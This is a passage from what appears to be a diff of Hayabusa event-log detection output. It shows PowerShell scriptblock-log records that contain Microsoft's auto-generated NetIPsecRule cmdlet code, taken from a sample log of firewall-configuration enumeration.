($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 